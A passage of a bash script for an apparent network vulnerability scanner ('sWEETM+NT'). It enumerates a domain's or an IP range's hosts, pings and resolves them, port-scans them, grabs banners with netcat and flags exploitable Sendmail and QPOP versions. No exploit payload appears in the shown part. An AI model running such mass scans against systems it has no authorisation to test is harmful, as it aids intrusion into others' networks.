        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "full" > /dev/null ) && [ -z $secondPARAM ]
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && [ -z $secondPARAM ]
    then
        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && [ -z $secondPARAM ]
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

else
    echo "* ERROR: unrecognized parameter on command line."
    echo " "
    echo "Only [-tar] [-full] [-enable:<opts>] [-disable:<opts>] are accepted."
    echo " "
    rm sweetmint.LOCK
    exit 1

fi

if ( echo "$nslookupPATH" | grep "not found" > /dev/null )
  then
      resolve_host='off'
fi

if ( echo "$showmountPATH" | grep "not found" > /dev/null )
  then
      remote_fs='off'
fi

if ( echo "$fingerPATH" | grep "not found" > /dev/null )
  then
      get_finger='off'
fi

if ( echo "$lynxPATH" | grep "not found" > /dev/null )
  then
      cgi_scan='off'
fi

if ( echo "$tarPATH" | grep "not found" > /dev/null )
  then
      tar_results='off'
fi

if ( echo "$gzipPATH" | grep "not found" > /dev/null )
  then
      tar_results='off'
fi

if ( echo "$pingPATH" | grep "not found" > /dev/null )
  then
      alive_host='off'
      bcast_scan='off'
fi

if ( echo "$rusersPATH" | grep "not found" > /dev/null )
  then
      rusers_scan='off'
fi

if [ "$smtppop3_bugs" = on ] && [ "$banner_dump" = off ]
  then
      banner_dump='on'
      echo "* Auto enable Banner dump of ports due to parameter 'S' enabled"
fi

if [ "$imap_bug" = on ] && [ "$banner_dump" = off ]
  then
      banner_dump='on'
      echo "* Auto enable Banner dump of ports due to parameter 'i' enabled"
fi

if [ "$rpc_info" = off ]
  then
      if [ "$remote_fs" = on ] || [ "$rusers_scan" = on ] 
        then
            rpc_info='on'

            if [ "$remote_fs" = on ] && [ "$rusers_scan" = on ]
              then 
                  echo "* Auto enable Collect RPC informations due to parameter 'f' and 'R' enabled"
            fi

            if [ "$rusers_scan" = on ] && [ "$remote_fs" = off ]
              then
                  echo "* Auto enable Collect RPC informations due to parameter 'R' enabled"
            fi

            if [ "$remote_fs" = on ] && [ "$rusers_scan" = off ]
              then
                  echo "* Auto enable Collect RPC informations due to parameter 'f' enabled"
            fi
      fi
fi


if [ ! "$resolve_host" = on ] && [ "$isONfilelist" = on ]
  then
      resolve_host='off'
      echo "* Auto disable resolve hostnames due to scan from filelist"
fi

if [ ! "$resolve_host" = on ] && [ "$isONrange" = on ]
  then
      alive_host='on'
      echo "* Auto enable ping for alive hosts due to scan of IPs range"
fi

if [ ! -e plugins.conf ]
  then
      echo "* Auto disable plugin processing due to missing plugins.conf file"
      use_plugins='off'
fi

echo "  - Resolve hostnames            : $resolve_host"
echo "  - Find alive hosts             : $alive_host"
echo "  - Remote mountable directories : $remote_fs"
echo "  - Check for CGI exploits       : $cgi_scan"
echo "  - Wingate scanning             : $wingate_scan"
echo "  - Netbios shared resources scan: $netbios_scan"
echo "  - Collect RPC informations     : $rpc_info"
echo "  - Collect BIND version         : $bind_ver"
echo "  - Check for BIND exploits      : $bind_exploit"
echo "  - Collect FINGER informations  : $get_finger"
echo "  - Collect NIS maps listing     : $nis_map"
echo "  - Dump greet banners           : $banner_dump"
echo "  - RUSERS info collection       : $rusers_scan"
echo "  - Linux IMAP bug check         : $imap_bug"
echo "  - SMTP and POP3 bugs check     : $smtppop3_bugs"
echo "  - Broadcast scanning           : $bcast_scan"
echo "  - Use external plugins         : $use_plugins"
echo "  - .TAR.GZipping of results     : $tar_results"

rm .smintrc
echo $uniqPATH >> .smintrc
echo $nslookupPATH >> .smintrc
echo $sortPATH >> .smintrc
echo $cutPATH >> .smintrc
echo $showmountPATH >> .smintrc
echo $nohupPATH >> .smintrc
echo $fingerPATH >> .smintrc
echo $lynxPATH >> .smintrc
echo $tarPATH >> .smintrc
echo $gzipPATH >> .smintrc
echo $pingPATH >> .smintrc
echo $rusersPATH >> .smintrc
echo $traceroutePATH >> .smintrc
echo "params $defaultPARAMETERS" >> .smintrc

chmod ugo+rw .smintrc

echo " "
echo "* Parameters saved in .smintrc for later use."
echo " "

# PLUGINS INITIALIZATION ------------------------------------------------

if [ "$use_plugins" = on ]
  then
      echo "* Loading user plugins..."

      if [ -e $tmpdir/plugins.active ]
        then
            rm $tmpdir/*.plugin
            if [ -e $tmpdir/plugins.singlerun ]
              then
                  rm $tmpdir/plugins.singlerun
            fi
            if [ -e $tmpdir/plugins.listrun ]
              then
                  rm $tmpdir/plugins.listrun  
            fi
            if [ -e $tmpdir/plugins.postrun ]
              then
                  rm $tmpdir/plugins.postrun
            fi

            rm $tmpdir/plugins.active
      fi

      plugTEMP=`cat plugins.conf | grep "plugins_directory="`      
      pluginsDIR=`echo $plugTEMP | cut --characters=19-`

      cat plugins.conf | grep "startplugin--" >> $tmpdir/pnames.temp
      
      for defplugin in `cat $tmpdir/pnames.temp`
         do

           touch $tmpdir/plugins.active

           plugTEMP=`echo $defplugin | cut --characters=14-`
           cat plugins.conf | grep "$plugTEMP" >> $tmpdir/$plugTEMP.plugin

           plugSTATUS=`cat $tmpdir/$plugTEMP.plugin | grep "_status" | cut -d'=' --fields=2`

           plugTYPE=`cat $tmpdir/$plugTEMP.plugin | grep "_type" | cut -d'=' --fields=2`  

           if [ "$plugTYPE" = single ]
             then 
                 if [ "$plugSTATUS" = enable ]
                   then
                       echo $plugTEMP >> $tmpdir/plugins.singlerun
                 fi

             elif [ "$plugTYPE" = list ]
                 then
                     if [ "$plugSTATUS" = enable ]
                       then
                           echo $plugTEMP >> $tmpdir/plugins.listrun
                     fi

             elif [ "$plugTYPE" = post ]
                 then
                     if [ "$plugSTATUS" = enable ]
                       then
                           echo $plugTEMP >> $tmpdir/plugins.postrun
                     fi

             else
                 echo "* ERROR: Unknown plugin type ($plugTYPE)"
                 rm sweetmint.LOCK
                 exit 1
           fi

           if [ "$plugSTATUS" = enable ]
             then
                 plugIDT=`cat $tmpdir/$plugTEMP.plugin | grep "_id" | cut -d'=' --fields=2` 

                 echo "* Loaded: $plugIDT"

                 plugDISABLE=`cat $tmpdir/$plugTEMP.plugin | grep "_disable" | cut -d'=' --fields=2`

                 if [ ! -z "$plugDISABLE" ]
                   then
                       echo "* Plugin disabled the following internal options:"

                 if ( echo "$plugDISABLE" | grep "f" > /dev/null )
                   then
                       remote_fs='off'
                       echo "  - Remote mountable directories : $remote_fs"
                 fi

                 if ( echo "$plugDISABLE" | grep "c" > /dev/null )
                   then
                       cgi_scan='off'
                       echo "  - Check for CGI exploits       : $cgi_scan"
                 fi

                 if ( echo "$plugDISABLE" | grep "w" > /dev/null )
                   then
                       wingate_scan='off'
                       echo "  - Wingate scanning             : $wingate_scan"
                 fi

                 if ( echo "$plugDISABLE" | grep "s" > /dev/null )
                   then
                       netbios_scan='off'
                       echo "  - Netbios shared resources scan: $netbios_scan"
                 fi

                 if ( echo "$plugDISABLE" | grep "r" > /dev/null )
                   then
                       rpc_info='off'
                       echo "  - Collect RPC informations     : $rpc_info"
                 fi

                 if ( echo "$plugDISABLE" | grep "b" > /dev/null )
                   then
                       bind_ver='off'
                       echo "  - Collect BIND version         : $bind_ver"
                 fi

                 if ( echo "$plugDISABLE" | grep "B" > /dev/null )
                   then
                       bind_exploit='off'
                       echo "  - Check for BIND exploits      : $bind_exploit"
                 fi

                 if ( echo "$plugDISABLE" | grep "F" > /dev/null )
                   then
                       get_finger='off'
                       echo "  - Collect FINGER informations  : $get_finger"
                 fi

                 if ( echo "$plugDISABLE" | grep "N" > /dev/null )
                   then
                       nis_map='off'
                       echo "  - Collect NIS maps listing     : $nis_map"
                 fi

                 if ( echo "$plugDISABLE" | grep "d" > /dev/null )
                   then
                       banner_dump='off'
                       echo "  - Dump greet banners           : $banner_dump"
                 fi

                 if ( echo "$plugDISABLE" | grep "R" > /dev/null )
                   then
                       rusers_scan='off'
                       echo "  - RUSERS info collection       : $rusers_scan"
                 fi

                 if ( echo "$plugDISABLE" | grep "t" > /dev/null )
                   then
                       bcast_scan='off'
                       echo "  - Broadcast scanning           : $bcast_scan"
                 fi

                 if ( echo "$plugDISABLE" | grep "T" > /dev/null ) && [ "$plugTYPE" = post ] && [ "$tar_results" = on ]
                   then
                       tar_results='off'
                       echo "  - .TAR.GZipping of results     : $tar_results"
                 fi

                 if ( echo "$plugDISABLE" | grep "i" > /dev/null )
                   then
                       imap_bug='off'
                       echo "  - Linux IMAP bug check         : $imap_bug"
                 fi

                 if ( echo "$plugDISABLE" | grep "S" > /dev/null )
                   then
                       smtppop3_bugs='off'
                       echo "  - SMTP and POP3 bugs check     : $smtppop3_bugs"
                 fi

                 fi
            fi
 
         done

         rm $tmpdir/pnames.temp
 
         echo " "
fi

# ---------------------------------------------------------------------

echo -n "* Updating history file... "

if ( echo "$scanDOMAIN" | grep "resume:" > /dev/null )
  then
      echo "$scanDOMAIN" >> $tmpdir/r.tmp
      scanRESUME=`cat $tmpdir/r.tmp | cut -d':' --fields=2`
      rm $tmpdir/r.tmp
      echo -n "$timeINFO: resumed scan [$scanRESUME]" >> .smhistory

elif ( echo "$scanDOMAIN" | grep "single:" > /dev/null )
    then
        echo "$scanDOMAIN" >> $tmpdir/s.tmp
        scanSINGLE=`cat $tmpdir/s.tmp | cut -d':' --fields=2`
        rm $tmpdir/s.tmp
        echo -n "$timeINFO: single host [$scanSINGLE]" >> .smhistory
        singleisON='on'

elif ( echo "$scanDOMAIN" | grep "file:" > /dev/null )
    then
        echo "$scanDOMAIN" >> $tmpdir/s.tmp
        scanFILE=`cat $tmpdir/s.tmp | cut -d':' --fields=2`
        rm $tmpdir/s.tmp
        echo -n "$timeINFO: scan from file [$scanFILE]" >> .smhistory
        
elif ( echo "$scanDOMAIN" | grep "range:" > /dev/null )
    then
        echo -n "$timeINFO: IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend]" >> .smhistory
        
else
    echo -n "$timeINFO: domain [$scanDOMAIN]" >> .smhistory
fi

echo " " >> .smhistory
echo "done."

rm sweetmint.LOCK

# ------------------------------------------------------------------------
# START SHAKING AND ROLLING A LOTTA!
# ------------------------------------------------------------------------

echo " "
echo "* --- Start shaking and rolling a lotta! ---"
echo " "

if ( ! echo "$scanDOMAIN" | grep "resume:" > /dev/null ) && ( ! echo "$scanDOMAIN" | grep "single:" > /dev/null ) && ( ! echo "$scanDOMAIN" | grep "file:" > /dev/null ) && ( ! echo "$scanDOMAIN" | grep "range:" > /dev/null )
  then
      touch $scanDOMAIN.results
      echo "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE" >> $scanDOMAIN.results
      echo "Scan log for domain $scanDOMAIN" >> $scanDOMAIN.results
      echo "Created on $timeINFO by user $userID" >> $scanDOMAIN.results
      echo "Parameters for this run were: $defaultPARAMETERS" >> $scanDOMAIN.results
      echo " " >> $scanDOMAIN.results
fi

if ( echo "$scanDOMAIN" | grep "single:" > /dev/null )
  then
      touch $scanSINGLE.results
      echo "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE" >> $scanSINGLE.results
      echo "Scan log for single host $scanSINGLE" >> $scanSINGLE.results
      echo "Created on $timeINFO by user $userID" >> $scanSINGLE.results
      echo "Parameters for this run were: $defaultPARAMETERS" >> $scanSINGLE.results
      echo " " >> $scanSINGLE.results 
fi

if ( echo "$scanDOMAIN" | grep "file:" > /dev/null )
  then
      touch $scanFILE.results
      echo "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE" >> $scanFILE.results
      echo "Scan log for hosts in file $scanFILE" >> $scanFILE.results
      echo "Created on $timeINFO by user $userID" >> $scanFILE.results
      echo "Parameters for this run were: $defaultPARAMETERS" >> $scanFILE.results
      echo " " >> $scanFILE.results 
fi

if ( echo "$scanDOMAIN" | grep "range:" > /dev/null )
  then
      touch $scanRANGE.results
      echo "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE" >> $scanRANGE.results
      echo "Scan log for IPs in range $rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend" >> $scanRANGE.results
      echo "Created on $timeINFO by user $userID" >> $scanRANGE.results
      echo "Parameters for this run were: $defaultPARAMETERS" >> $scanRANGE.results
      echo " " >> $scanRANGE.results 

fi

if ( ! echo "$scanDOMAIN" | grep "resume:" > /dev/null )
  then

# -- ip generation stuff --

if ( echo "$scanDOMAIN" | grep "single:" > /dev/null )
  then
      echo "$scanDOMAIN" >> $tmpdir/s.tmp
      scanSINGLE=`cat $tmpdir/s.tmp | cut -d':' --fields=2`
      rm $tmpdir/s.tmp
      scanDOMAIN=`echo "$scanSINGLE"`

      echo "$scanDOMAIN" > $scanDOMAIN.ip
      echo " " >> $scanDOMAIN.ip


elif ( echo "$scanDOMAIN" | grep "file:" > /dev/null )
    then
        echo "$scanDOMAIN" >> $tmpdir/s.tmp
        scanFILE=`cat $tmpdir/s.tmp | cut -d':' --fields=2`
        rm $tmpdir/s.tmp
        scanDOMAIN=`echo "$scanFILE"`
        cp $scanFILE $scanFILE.ip

elif ( echo "$scanDOMAIN" | grep "range:" > /dev/null )
    then
        echo "$scanDOMAIN" >> $tmpdir/s.tmp
        scanRANGEtmp=`cat $tmpdir/s.tmp | cut -d':' --fields=2`
        rm $tmpdir/s.tmp
        scanDOMAIN=`echo "$scanRANGE"`

        loopONE=$rangeONEstart
        loopTWO=$rangeTWOstart
        loopTHREE=$rangeTHREEstart
        loopFOUR=$rangeFOURstart

        touch $scanDOMAIN.ip

        echo "* Calculating IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend] (may take a while)"

        while [ ! "$loopONE" -gt $rangeONEend ]
         do
          while [ ! "$loopTWO" -gt $rangeTWOend ]
           do
            while [ ! "$loopTHREE" -gt $rangeTHREEend ]
             do
              while [ ! "$loopFOUR" -gt $rangeFOURend ]
               do
                echo "$loopONE.$loopTWO.$loopTHREE.$loopFOUR" >> $scanDOMAIN.ip
                loopFOUR=$[$loopFOUR+1]
               done
              loopFOUR=$rangeFOURstart
              loopTHREE=$[$loopTHREE+1]
             done
            loopTHREE=$rangeTHREEstart
            loopTWO=$[$loopTWO+1]
           done
          loopTWO=$rangeTWOstart
          loopONE=$[$loopONE+1]
         done

     echo " " >> $scanDOMAIN.ip

else

    echo "* Generating IP list of machines for [$scanDOMAIN]"
    $extrabinPATH/z0ne -o $scanDOMAIN > $scanDOMAIN.ip 
    echo " " >> $scanDOMAIN.ip 

fi

echo "IP's of machines in the domain:" >> $scanDOMAIN.results
cat $scanDOMAIN.ip >> $scanDOMAIN.results
echo " " >> $scanDOMAIN.results

if [ "$alive_host" = on ]
  then
      echo "* Verifying alive hosts in $scanDOMAIN.ip (it takes a while)"
      touch $scanDOMAIN.ip.alive
      for alivehosts in `cat $scanDOMAIN.ip`
         do
           $pingPATH $alivehosts -c 2 > $tmpdir/alive.temp
               if ( ! cat $tmpdir/alive.temp | grep "0 packets received, 100% packet loss" >/dev/null )
                 then
                     echo "$alivehosts" >> $scanDOMAIN.ip.alive
               fi
               rm $tmpdir/alive.temp
         done

      echo "ip's of ALIVE machines in the domain:" >> $scanDOMAIN.results
      cat $scanDOMAIN.ip.alive >> $scanDOMAIN.results
      echo " " >> $scanDOMAIN.results
fi

if [ "$resolve_host" = on ]
  then
      if [ "$alive_host" = on ]
        then
            resolveUSElist=$scanDOMAIN.ip.alive
        else
            resolveUSElist=$scanDOMAIN.ip
      fi

      echo "* Resolving ip's to hostnames in $resolveUSElist (it takes a while)"

           $nslookupPATH < $resolveUSElist > $tmpdir/$resolveUSElist.temp
           grep Name $tmpdir/$resolveUSElist.temp > $tmpdir/$resolveUSElist.temp2
           $cutPATH --characters=10- $tmpdir/$resolveUSElist.temp2 > $scanDOMAIN.hosts
           rm $tmpdir/$resolveUSElist.temp
           rm $tmpdir/$resolveUSElist.temp2

      echo "hostnames of machines in the domain:" >> $scanDOMAIN.results
      cat $scanDOMAIN.hosts >> $scanDOMAIN.results
      echo " " >> $scanDOMAIN.results
       
fi

fi  

if [ "$alive_host" = on ] && [ "$resolve_host" = on ]
  then
      mainLIST=$scanDOMAIN.hosts
      mainLISTip=$scanDOMAIN.ip.alive
fi

if [ "$alive_host" = on ] && [ "$resolve_host" = off ]
  then
      mainLIST=$scanDOMAIN.ip.alive
      mainLISTip=$scanDOMAIN.ip.alive
fi

if [ "$alive_host" = off ] && [ "$resolve_host" = on ]
  then
      mainLIST=$scanDOMAIN.hosts
      mainLISTip=$scanDOMAIN.ip
fi

if [ "$alive_host" = off ] && [ "$resolve_host" = off ]
  then
      mainLIST=$scanDOMAIN.ip
      mainLISTip=$scanDOMAIN.ip
fi

mainLISTwgatez=$mainLIST

if ( echo "$scanDOMAIN" | grep "resume:" > /dev/null )
  then
      echo "$scanDOMAIN" >> $tmpdir/r.tmp
      scanRESUME=`cat $tmpdir/r.tmp | cut -d':' --fields=2`
      rm $tmpdir/r.tmp
      scanDOMAIN=`echo "$scanRESUME"`

      if [ -e $scanDOMAIN.resumelist ]
        then
            rm $scanDOMAIN.resumelist
      fi     

      cp $scanDOMAIN.resume $tmpdir/resumelist.temp
   
      for siteresume in `cat $scanDOMAIN.done`
         do
           cat $tmpdir/resumelist.temp | grep -v "$siteresume" > $tmpdir/resumelist.temp
         done

      cp $tmpdir/resumelist.temp $scanDOMAIN.resumelist
      rm $tmpdir/resumelist.temp

      mainLIST=$scanDOMAIN.resumelist

      echo "[$timeINFO: Resuming previously aborted scan...]" >> $scanDOMAIN.results
      echo " " >> $scanDOMAIN.results

else
    echo "[Scan results for machines in $mainLIST]" >> $scanDOMAIN.results
    echo " " >> $scanDOMAIN.results

    cp $mainLIST $scanDOMAIN.resume

fi

echo "* Starting main scan loop - using list $mainLIST"

for siteprocess in `cat $mainLIST`
   do

     echo "* Processing host: $siteprocess"
     
     echo "Machine $siteprocess:" >> $scanDOMAIN.results
     echo " " >> $scanDOMAIN.results

     $extrabinPATH/strobe -q -o $tmpdir/portscan.temp -b 1 -e 1080 -t 10 $siteprocess > $tmpdir/portscan.temp

     echo "Open ports from 1 to 1080:" >> $scanDOMAIN.results
     cat $tmpdir/portscan.temp | grep -v "Open ports" >> $scanDOMAIN.results
     echo " " >> $scanDOMAIN.results 

#-------------- single plugins part

if [ "$use_plugins" = on ] && [ -e $tmpdir/plugins.singlerun ]
  then
      for execplugin in `cat $tmpdir/plugins.singlerun`
         do
           plugFILE=`cat $tmpdir/$execplugin.plugin | grep "_file" | cut -d'=' --fields=2`
           plugPARAMS=`cat $tmpdir/$execplugin.plugin | grep "_params" | cut -d'=' --fields=2`
           plugLEVEL=`cat $tmpdir/$execplugin.plugin | grep "_level" | cut -d'=' --fields=2`

           if [ "$plugLEVEL" = $userTYPE ]
             then
                 echo "$plugPARAMS" >> $tmpdir/plugparams.temp 

                 echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline
                 echo -n "/" >> $tmpdir/plugin.tempcommandline
                 echo -n "$plugFILE" >> $tmpdir/plugin.tempcommandline
                 echo -n " " >> $tmpdir/plugin.tempcommandline

                 for pluginparameter in `cat $tmpdir/plugparams.temp`
                    do
                      if [ "$pluginparameter" = completeLIST ]
                        then
                            echo -n "$mainLIST" >> $tmpdir/plugin.tempcommandline
               
                      elif [ "$pluginparameter" = currentHOST ]
                          then
                              echo -n "$siteprocess" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = resultsFILE ]
                          then
                              echo -n "$scanDOMAIN.results" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = pluginsDIRECTORY ]
                          then
                              echo -n "$pluginsDIR" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = temporaryDIR ]
                          then
                              echo -n "$tmpdir" >> $tmpdir/plugin.tempcommandline

                      elif [ "$pluginparameter" = completeIPLIST ]
                          then
                              echo -n "$mainLISTip" >> $tmpdir/plugin.tempcommandline 
 
                      else
                          echo -n "$pluginparameter" >> $tmpdir/plugin.tempcommandline

                      fi
 
                      echo -n " " >> $tmpdir/plugin.tempcommandline

                    done

                 pluginEXEC=`cat $tmpdir/plugin.tempcommandline`

                 ( . $pluginEXEC )

                 rm $tmpdir/plugparams.temp
                 rm $tmpdir/plugin.tempcommandline
        
           fi

         done

fi

#----------------------------------------------------------

#--------------BANNER DUMPING
     if [ "$banner_dump" = on ]
       then

           if ( cat $tmpdir/portscan.temp | grep "21/tcp" > /dev/null )
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t $siteprocess 21 > $tmpdir/$siteprocess.ftpbanner 2>/dev/null
                 echo "Banner on standard FTP port (21)" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.ftpbanner >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 rm $tmpdir/$siteprocess.ftpbanner
           fi

           if ( cat $tmpdir/portscan.temp | grep "23/tcp" > /dev/null )
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t $siteprocess 23 > $tmpdir/$siteprocess.telnetbanner 2>/dev/null
                 echo "Banner on standard TELNET port (23)" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results

                 if ( cat $tmpdir/$siteprocess.telnetbanner | grep "inux" > /dev/null )
                   then
                       remoteOStype='linux'
                   else
                       remoteOStype='notlinux'
                 fi

                 cat $tmpdir/$siteprocess.telnetbanner >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 rm $tmpdir/$siteprocess.telnetbanner
           fi

           if ( cat $tmpdir/portscan.temp | grep "25/tcp" > /dev/null )
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t $siteprocess 25 > $tmpdir/$siteprocess.smtpbanner 2>/dev/null
                 echo "Banner on standard SMTP port (25)" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.smtpbanner >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results

                 if [ "$smtppop3_bugs" = on ]
                   then
                       if ( cat $tmpdir/$siteprocess.smtpbanner | grep "endmail" > /dev/null ) || (cat $tmpdir/$siteprocess.smtpbanner | grep "endMail" > /dev/null ) 
                         then
                             if ( cat $tmpdir/$siteprocess.smtpbanner | grep "4.1" > /dev/null ) || ( cat $tmpdir/$siteprocess.smtpbanner | grep "5.55" > /dev/null ) || ( cat $tmpdir/$siteprocess.smtpbanner | grep "5.59" > /dev/null ) || ( cat $tmpdir/$siteprocess.smtpbanner | grep "5.64" > /dev/null ) || ( cat $tmpdir/$siteprocess.smtpbanner | grep "5.65" > /dev/null )
                               then 
                                   echo "Exploitable Sendmain present on system" >> $scanDOMAIN.results
                                   echo " " >> $scanDOMAIN.results
                             fi
                       fi
                 fi

                 rm $tmpdir/$siteprocess.smtpbanner
           fi

           if ( cat $tmpdir/portscan.temp | grep "110/tcp" > /dev/null )
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t $siteprocess 110 > $tmpdir/$siteprocess.pop3banner 2>/dev/null
                 echo "Banner on standard POP3 port (110)" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.pop3banner >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results

                 if [ "$smtppop3_bugs" = on ]
                   then
                       if ( cat $tmpdir/$siteprocess.pop3banner | grep "QPOP" > /dev/null )
                         then
                             if ( cat $tmpdir/$siteprocess.pop3banner | grep "2.2" > /dev/null ) || ( cat $tmpdir/$siteprocess.pop3banner | grep "2.4" > /dev/null ) || ( cat $tmpdir/$siteprocess.pop3banner | grep "2.3" > /dev/null ) || ( cat $tmpdir/$siteprocess.pop3banner | grep "2.1.4" > /dev/null )
                               then
                                   echo "Exploitable QPOPPER present on system" >> $scanDOMAIN.results
                                   echo " " >> $scanDOMAIN.results
                             fi
                       fi
                 fi

                 rm $tmpdir/$siteprocess.pop3banner
           fi

           if (cat $tmpdir/portscan.temp | grep "143/tcp" > /dev/null )
             then
                 echo "sWEETM+NT" | $extrabinPATH/nc -v -w 10 -t $siteprocess 143 > $tmpdir/$siteprocess.imap4banner 2>/dev/null
                 echo "Banner on standard IMAP2 port (143)" >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 cat $tmpdir/$siteprocess.imap4banner >> $scanDOMAIN.results
                 echo " " >> $scanDOMAIN.results
                 if [ "$imap_bug" = on ]
                   then
                       if [ "$remoteOStype" = linux ]
                         then
                             echo -n "(Linux) " >> $scanDOMAIN.results
                        fi

